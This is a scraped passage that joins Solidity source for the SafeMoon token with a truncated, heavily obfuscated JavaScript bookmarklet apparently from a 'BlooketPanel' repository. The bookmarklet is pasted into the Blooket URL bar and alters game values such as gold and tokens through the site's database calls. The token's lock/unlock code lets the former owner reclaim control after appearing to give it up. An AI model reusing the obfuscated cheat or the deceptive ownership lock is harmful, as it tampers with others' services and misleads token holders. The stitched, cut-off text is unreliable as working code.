returned // for accounts without code, i.e. `keccak256('')` bytes32 codehash; bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470; // solhint-disable-next-line no-inline-assembly assembly { codehash := extcodehash(account) } return (codehash != accountHash && codehash != 0x0); } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); // solhint-disable-next-line avoid-low-level-calls, avoid-call-value (bool success, ) = recipient.call{ value: amount }(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain`call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) { return _functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); return _functionCallWithValue(target, data, value, errorMessage); } function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) { require(isContract(target), "Address: call to non-contract"); // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory returndata) = target.call{ value: weiValue }(data); if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly // solhint-disable-next-line no-inline-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ contract Ownable is Context { address private _owner; address private _previousOwner; uint256 private _lockTime; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () internal { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } function geUnlockTime() public view returns (uint256) { return _lockTime; } //Locks the contract for owner for the amount of time provided function lock(uint256 time) public virtual onlyOwner { _previousOwner = _owner; _owner = address(0); _lockTime = now + time; emit OwnershipTransferred(_owner, address(0)); } //Unlocks the contract for owner when _lockTime is exceeds function unlock() public virtual { require(_previousOwner == msg.sender, "You don't have permission to unlock"); require(now > _lockTime , "Contract is locked until 7 days"); emit OwnershipTransferred(_owner, _previousOwner); _owner = _previousOwner; } } // pragma solidity >=0.5.0; interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } // pragma solidity >=0.5.0; interface IUniswapV2Pair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom(address from, address to, uint value) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external; event Mint(address indexed sender, uint amount0, uint amount1); event Burn(address indexed sender, uint amount0, uint amount1, address indexed to); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function mint(address to) external returns (uint liquidity); function burn(address to) external returns (uint amount0, uint amount1); function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } // pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } // pragma solidity >=0.6.2; interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } contract SafeMoon is Context, IERC20, Ownable { using SafeMath for uint256; using Address for address; mapping (address => uint256) private _rOwned; mapping (address => uint256) private _tOwned; mapping (address => mapping (address => uint256)) private _allowances; mapping (address => bool) private _isExcludedFromFee; mapping (address => bool) private _isExcluded; address[] private _excluded; uint256 private constant MAX = ~uint256(0); uint256 private _tTotal = 1000000000 * 10**6 * 10**9; uint256 private _rTotal = (MAX - (MAX % _tTotal)); uint256 private _tFeeTotal; string private _name = "SafeMoon"; string private _symbol = "SAFEMOON"; uint8 private _decimals = 9; uint256 public _taxFee = 5; uint256 private _previousTaxFee = _taxFee; uint256 public _liquidityFee = 5; uint256 private _previousLiquidityFee = _liquidityFee; IUniswapV2Router02 public immutable uniswapV2Router; address public immutable uniswapV2Pair; bool inSwapAndLiquify; bool public swapAndLiquifyEnabled = true; uint256 public _maxTxAmount = 5000000 * 10**6 * 10**9; uint256 private numTokensSellToAddToLiquidity = 500000 * 10**6 * 10**9; event MinTokensBeforeSwapUpdated(uint256 minTokensBeforeSwap); event SwapAndLiquifyEnabledUpdated(bool enabled); event SwapAndLiquify( uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiqudity ); modifier lockTheSwap { inSwapAndLiquify = true; _; inSwapAndLiquify = false; } constructor () public { _rOwned[_msgSender()] = _rTotal; IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x05fF2B0DB69458A0750badebc4f9e13aDd608C7F); // Create a uniswap pair for this new token uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()) .createPair(address(this), _uniswapV2Router.WETH()); // set the rest of the contract variables uniswapV2Router = _uniswapV2Router; //exclude owner and this contract from fee _isExcludedFromFee[owner()] = true; _isExcludedFromFee[address(this)] = true; emit Transfer(address(0), _msgSender(), _tTotal); } function name() public view returns (string memory) { return _name; } function symbol() public view returns (string memory) { return _symbol; } function decimals() public view returns (uint8) { return _decimals; } function totalSupply() public view override returns (uint256) { return _tTotal; } function balanceOf(address account) public view override returns (uint256) { if (_isExcluded[account]) return _tOwned[account]; return tokenFromReflection(_rOwned[account]); } function transfer(address recipient, uint256 amount) public override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } function isExcludedFromReward(address account) public view returns (bool) { return _isExcluded[account]; } function totalFees() public view returns (uint256) { return _tFeeTotal; } function deliver(uint256 tAmount) public { address sender = _msgSender(); require(!_isExcluded[sender], "Excluded addresses cannot call this function"); (uint256 rAmount,,,,,) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rTotal = _rTotal.sub(rAmount); _tFeeTotal = _tFeeTotal.add(tAmount); } function reflectionFromToken(uint256 tAmount, bool deductTransferFee) public view returns(uint256) { require(tAmount <= _tTotal, "Amount must be less than supply"); if (!deductTransferFee) { (uint256 rAmount,,,,,) = _getValues(tAmount); return rAmount; } else { (,uint256 rTransferAmount,,,,) = _getValues(tAmount); return rTransferAmount; } } function tokenFromReflection(uint256 rAmount) public view returns(uint256) { require(rAmount <= _rTotal, "Amount must be less than total reflections"); uint256 currentRate = _getRate(); return rAmount.div(currentRate); } function excludeFromReward(address account) public onlyOwner() { // require(account != 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 'We can not exclude Uniswap router.'); require(!_isExcluded[account], "Account is already excluded"); if(_rOwned[account] > 0) { _tOwned[account] = tokenFromReflection(_rOwned[account]); } _isExcluded[account] = true; _excluded.push(account); } function includeInReward(address account) external onlyOwner() { require(_isExcluded[account], "Account is already excluded"); for (uint256 i = 0; i < _excluded.length; i++) { if (_excluded[i] == account) { _excluded[i] = _excluded[_excluded.length - 1]; _tOwned[account] = 0; _isExcluded[account] = false; _excluded.pop(); break; } } } function _transferBothExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _tOwned[sender] = _tOwned[sender].sub(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } function excludeFromFee(address account) public onlyOwner { _isExcludedFromFee[account] = true; } function includeInFee(address account) public onlyOwner { _isExcludedFromFee[account] = false; } function setTaxFeePercent(uint256 taxFee) external onlyOwner() { _taxFee = taxFee; } function setLiquidityFeePercent(uint256 liquidityFee) external onlyOwner() { _liquidityFee = liquidityFee; } function setMaxTxPercent(uint256 maxTxPercent) external onlyOwner() { _maxTxAmount = _tTotal.mul(maxTxPercent).div( 10**2 ); } function setSwapAndLiquifyEnabled(bool _enabled) public onlyOwner { swapAndLiquifyEnabled = _enabled; emit SwapAndLiquifyEnabledUpdated(_enabled); } //to recieve ETH from uniswapV2Router when swaping receive() external payable {} function _reflectFee(uint256 rFee, uint256 tFee) private { _rTotal = _rTotal.sub(rFee); _tFeeTotal = _tFeeTotal.add(tFee); } function _getValues(uint256 tAmount) private view returns (uint256, uint256, uint256, uint256, uint256, uint256) { (uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getTValues(tAmount); (uint256 rAmount, uint256 rTransferAmount, uint256 rFee) = _getRValues(tAmount, tFee, tLiquidity, _getRate()); return (rAmount, rTransferAmount, rFee, tTransferAmount, tFee, tLiquidity); } function _getTValues(uint256 tAmount) private view returns (uint256, uint256, uint256) { uint256 tFee = calculateTaxFee(tAmount); uint256 tLiquidity = calculateLiquidityFee(tAmount); uint256 tTransferAmount = tAmount.sub(tFee).sub(tLiquidity); return (tTransferAmount, tFee, tLiquidity); } function _getRValues(uint256 tAmount, uint256 tFee, uint256 tLiquidity, uint256 currentRate) private pure returns (uint256, uint256, uint256) { uint256 rAmount = tAmount.mul(currentRate); uint256 rFee = tFee.mul(currentRate); uint256 rLiquidity = tLiquidity.mul(currentRate); uint256 rTransferAmount = rAmount.sub(rFee).sub(rLiquidity); return (rAmount, rTransferAmount, rFee); } function _getRate() private view returns(uint256) { (uint256 rSupply, uint256 tSupply) = _getCurrentSupply(); return rSupply.div(tSupply); } function _getCurrentSupply() private view returns(uint256, uint256) { uint256 rSupply = _rTotal; uint256 tSupply = _tTotal; for (uint256 i = 0; i < _excluded.length; i++) { if (_rOwned[_excluded[i]] > rSupply || _tOwned[_excluded[i]] > tSupply) return (_rTotal, _tTotal); rSupply = rSupply.sub(_rOwned[_excluded[i]]); tSupply = tSupply.sub(_tOwned[_excluded[i]]); } if (rSupply < _rTotal.div(_tTotal)) return (_rTotal, _tTotal); return (rSupply, tSupply); } function _takeLiquidity(uint256 tLiquidity) private { uint256 currentRate = _getRate(); uint256 rLiquidity = tLiquidity.mul(currentRate); _rOwned[address(this)] = _rOwned[address(this)].add(rLiquidity); if(_isExcluded[address(this)]) _tOwned[address(this)] = _tOwned[address(this)].add(tLiquidity); } function calculateTaxFee(uint256 _amount) private view returns (uint256) { return _amount.mul(_taxFee).div( 10**2 ); } function calculateLiquidityFee(uint256 _amount) private view returns (uint256) { return _amount.mul(_liquidityFee).div( 10**2 ); } function removeAllFee() private { if(_taxFee == 0 && _liquidityFee == 0) return; _previousTaxFee = _taxFee; _previousLiquidityFee = _liquidityFee; _taxFee = 0; _liquidityFee = 0; } function restoreAllFee() private { _taxFee = _previousTaxFee; _liquidityFee = _previousLiquidityFee; } function isExcludedFromFee(address account) public view returns(bool) { return _isExcludedFromFee[account]; } function _approve(address owner, address spender, uint256 amount) private { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _transfer( address from, address to, uint256 amount ) private { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); require(amount > 0, "Transfer amount must be greater than zero"); if(from != owner() && to != owner()) require(amount <= _maxTxAmount, "Transfer amount exceeds the maxTxAmount."); // is the token balance of this contract address over the min number of // tokens that we need to initiate a swap + liquidity lock? // also, don't get caught in a circular liquidity event. // also, don't swap & liquify if sender is uniswap pair. uint256 contractTokenBalance = balanceOf(address(this)); if(contractTokenBalance >= _maxTxAmount) { contractTokenBalance = _maxTxAmount; } bool overMinTokenBalance = contractTokenBalance >= numTokensSellToAddToLiquidity; if ( overMinTokenBalance && !inSwapAndLiquify && from != uniswapV2Pair && swapAndLiquifyEnabled ) { contractTokenBalance = numTokensSellToAddToLiquidity; //add liquidity swapAndLiquify(contractTokenBalance); } //indicates if fee should be deducted from transfer bool takeFee = true; //if any account belongs to _isExcludedFromFee account then remove the fee if(_isExcludedFromFee[from] || _isExcludedFromFee[to]){ takeFee = false; } //transfer amount, it will take tax, burn, liquidity fee _tokenTransfer(from,to,amount,takeFee); } function swapAndLiquify(uint256 contractTokenBalance) private lockTheSwap { // split the contract balance into halves uint256 half = contractTokenBalance.div(2); uint256 otherHalf = contractTokenBalance.sub(half); // capture the contract's current ETH balance. // this is so that we can capture exactly the amount of ETH that the // swap creates, and not make the liquidity event include any ETH that // has been manually sent to the contract uint256 initialBalance = address(this).balance; // swap tokens for ETH swapTokensForEth(half); // <- this breaks the ETH -> HATE swap when swap+liquify is triggered // how much ETH did we just swap into? uint256 newBalance = address(this).balance.sub(initialBalance); // add liquidity to uniswap addLiquidity(otherHalf, newBalance); emit SwapAndLiquify(half, newBalance, otherHalf); } function swapTokensForEth(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); // make the swap uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private { // approve token transfer to cover all possible scenarios _approve(address(this), address(uniswapV2Router), tokenAmount); // add the liquidity uniswapV2Router.addLiquidityETH{value: ethAmount}( address(this), tokenAmount, 0, // slippage is unavoidable 0, // slippage is unavoidable owner(), block.timestamp ); } //this method is responsible for taking all fee, if takeFee is true function _tokenTransfer(address sender, address recipient, uint256 amount,bool takeFee) private { if(!takeFee) removeAllFee(); if (_isExcluded[sender] && !_isExcluded[recipient]) { _transferFromExcluded(sender, recipient, amount); } else if (!_isExcluded[sender] && _isExcluded[recipient]) { _transferToExcluded(sender, recipient, amount); } else if (!_isExcluded[sender] && !_isExcluded[recipient]) { _transferStandard(sender, recipient, amount); } else if (_isExcluded[sender] && _isExcluded[recipient]) { _transferBothExcluded(sender, recipient, amount); } else { _transferStandard(sender, recipient, amount); } if(!takeFee) restoreAllFee(); } function _transferStandard(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } function _transferToExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } function _transferFromExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _tOwned[sender] = _tOwned[sender].sub(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } } © 2021 GitHub, Inc. Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About
Torzuul / BlooketPaneltype into the url in blooket: javascript:(() => {/********************************************************************************************************************************************************************************************************* There's no point in editing this. If something breaks, then it just won't work for you, and then what? */const date = 1646073334986;if (Date.now() - date < 0 || Date.now() - date > (1000 * 60 * 60 * 24)) {if (confirm(%27Bookmarklet expired, please go to gbasil.dev/blooket and re-add it.\nThis ensures you have the most up to date version available.\nPress "Ok" to be redirected there.%27)) window.open(%27https://www.gbasil.dev/blooket%27);} else (() => {const theme = () => ({accent: %27#54d02b',text: '#e0e1f0',bg: '#14121a','bg-alt': '#201e26',});(function(i,k){const iz=gbasilDotDev_D,F=i();while(!![]){try{const D=-parseInt(iz(0x361))/(0x654+-0x1*-0xfb3+-0x1606)*(parseInt(iz(0x308))/(0x24b*0x7+-0x2*0x88d+0x10f))+parseInt(iz(0x34f))/(0x17+-0xfa+0xe6)*(-parseInt(iz(0x13f))/(-0x1a1*-0x13+-0x5*0x1+-0x1eea))+-parseInt(iz(0x15c))/(0x1237*-0x2+-0x1d8a*-0x1+0x6e9)+-parseInt(iz(0x2ec))/(-0x300+-0x15f6+0x4*0x63f)*(parseInt(iz(0x39b))/(-0x1090+0x1*0x1853+-0x14*0x63))+-parseInt(iz(0x1dc))/(-0xd0c+0x1ef4+-0x58*0x34)*(-parseInt(iz(0x31f))/(0x4*0x305+0x24c2+-0x3c1*0xd))+parseInt(iz(0x22e))/(-0x1*0x1a49+0x1*-0x1cf3+0x3746)*(parseInt(iz(0x214))/(0x1090+0x1733+-0x27b8))+parseInt(iz(0x15a))/(-0xd*-0x2a5+0x1*0x1f79+0x20e7*-0x2);if(D===k)break;else F['push'](F['shift']());}catch(B){F['push'](F['shift']());}}}(gbasilDotDev_F,0xc2817+0x41e3*0x1+-0x6125a));const gbasilDotDev_s=(function(){let i=!![];return function(k,F){const ij=gbasilDotDev_D;if('DzbZ'+'u'!=='zqnA'+'b'){const D=i?function(){const iZ=gbasilDotDev_D;if(iZ(0x21a)+'O'!==iZ(0x21a)+'O'){let J=O(iZ(0x34a)+'\x20of\x20'+iZ(0x2be)+'er'),r=w(iZ(0x322)+iZ(0x2ce)+iZ(0x144)+iZ(0x34d)+iZ(0x2b4)+'gold'+iZ(0x2e3));if(!J||!n(r))return x(iZ(0x35b)+iZ(0x27a)+iZ(0x25c)+'t');h[iZ(0x192)+iZ(0x20f)+'Prop'+'s'][iZ(0x165)+'base']['setV'+'al']({'id':X['memo'+iZ(0x20f)+iZ(0x1d4)+'s']['clie'+'nt']['host'+'Id'],'path':'c/'+G[iZ(0x192)+iZ(0x20f)+iZ(0x1d4)+'s'][iZ(0x341)+'nt'][iZ(0x33d)],'val':{'b':q['memo'+'ized'+iZ(0x1d4)+'s']['clie'+'nt'][iZ(0x238)+'k'],'g':m[iZ(0x192)+iZ(0x20f)+iZ(0x133)+'e'][iZ(0x2d0)],'tat':J+(iZ(0x233)+'p:')+r}});}else{if(F){if(iZ(0x258)+'P'===iZ(0x356)+'y')k[iZ(0x192)+iZ(0x20f)+'Stat'+'e'][iZ(0x13c)+'y'][iZ(0x21d)]=0x14*0x15b+0x21b2+-0x3cce*0x1;else{const r=F['appl'+'y'](k,arguments);return F=null,r;}}}}:function(){};return i=![],D;}else k['memo'+ij(0x20f)+ij(0x133)+'e']['myLi'+'fe']=0x1*-0x26e9+-0x1f21+0x466e;};}()),gbasilDotDev_v=gbasilDotDev_s(this,function(){const iY=gbasilDotDev_D;return gbasilDotDev_v[iY(0x20e)+iY(0x35c)]()[iY(0x229)+'ch'](iY(0x306)+iY(0x390)+'+)+$')[iY(0x20e)+iY(0x35c)]()['cons'+iY(0x197)+iY(0x17d)](gbasilDotDev_v)['sear'+'ch'](iY(0x306)+'+)+)'+'+)+$');});function gbasilDotDev_D(i,k){const F=gbasilDotDev_F();return gbasilDotDev_D=function(D,B){D=D-(-0x183f+0x7e5*0x3+-0x38*-0x8);let J=F[D];return J;},gbasilDotDev_D(i,k);}function gbasilDotDev_F(){const kL=['me=','or\x20t','our\x20','host','wqqx','mode','erBo','nswe','jJzR','ton','ng\x20f','jPhv','unt','Ches','tem','An\x20e','back','ible','om\x20P','ting','over','ler','cLnp','00%)','th\x20d','setV','inpu','\x20det','secr','uild','actE','ket.','eY(1','tYGa','ged\x20','FGVG','ooks','abil','to\x20s','ne\x22\x20','ord','ketB','path','eNod','hifX','e\x20tr','sk\x20f','\x20Ask','oks','llbl','hing','enu\x20','toke','\x20and','WDDc','ando','lid\x20','yer','Scri','s__c','alan','is\x20f','crea','bott','ck\x20A','poin','Char','ebuf','e,\x20a','test','atab','Gold','food','rHTM','List','oNPz','\x20you','api/','Rene','edBl','uest','\x20the','y\x20ag','Deco','alfi','game','oins','righ','Jbmf','div[','cent','ut\x20o','il\x20t','happ','acce','date','e/ga','time','json','stat','joke','div','20px','styl','rial','btoa','s\x20th','entL','rand','\x20fet','he\x20s','oks!','e\x20yo','veEv','eir\x20','Redu','dige','goal','rAll','d\x20nu','t\x20la','slat','slow','e\x20in','play','habC','jSgf','s*=\x27','bHOP','Roun','d\x20pl','\x20sit','Togg','ble','\x20sel','\x20(th','mVal','r\x20En','xpAv','romp','nt\x20t','\x20ocu','gold','soli','ev/b','t\x20ES','W\x20-\x20','Set\x20','\x20cha','getD','RZYF','AzmD','to\x20B','to\x20c','s/ve','ectP','ogge','en?)','g\x20us','lock','300p','\x20to','Play','\x20Tow','trol','cks','low','ZNqg','0px\x20','nse\x20','1002nfZhsz','y\x20li','Rate','LhiQ','from','KUdX','Rese','terE','appe','choi','subt','nven','aseV','SXOo','ate','ces','lica','grou','5px','or\x20s','ve\x20D','SHCZ','tFnc','find','\x20xp!','Cash','(((.','Buff','8mdbTGI','YbyI','xbRd','Due\x20',',\x20th','Stoc','sonp','ce\x20Q','in\x20t','ches','erRa','__bo','ails','e\x20te','nner','\x20Ans','ers','etti','defe','ebas','\x20be\x20','redu','heig','180yMaCTn','Qscr','e\x20ba','Amou','boxS','ude','ife\x20','ata!','Defe','bann','hoic','sfor','et.c','enco','fdUj','VTjO','sEtg','Max\x20','touc','full','Coin','DGlu','posi','Heal','ast\x20','encr','e\x20ri','ress','d\x20no','ySel','name','lane','re\x20h','g\x20bl','clie','ol.','ed.\x20','s/se','LqoS','\x20&\x20X','arts','ou\x27r','er\x20d','Name','o\x20up','clip','t\x20th','Spee','3eaGPlJ','nWCl','ys:\x0a','d\x20on','OjkD','_own','__re','ifPq','bord','\x20lif','kuCz','tSco','Inva','ring','\x20Dup','0000','ing\x20','t\x20am','99181qEGnKw','lWwG','top','100%','Size','lay','nsAv','webp','put','\x20to\x20','Clea','log','KdMK','curs','flow','leas','ith\x20','FjJs','hfcY','URAR','none','text','axiY','SSaz','aiti','hsta','ener','ines','keys','ion/','ackJ','e,\x20e','bhIw','priz','rops','matc','\x20tok','prog','\x20blo','ach','www.','map','AeJj','sion','iste','Alig','dren','+)+)','chil','fixe','/caf','com/','s*=s','5px\x20','emen','\x20#00','n\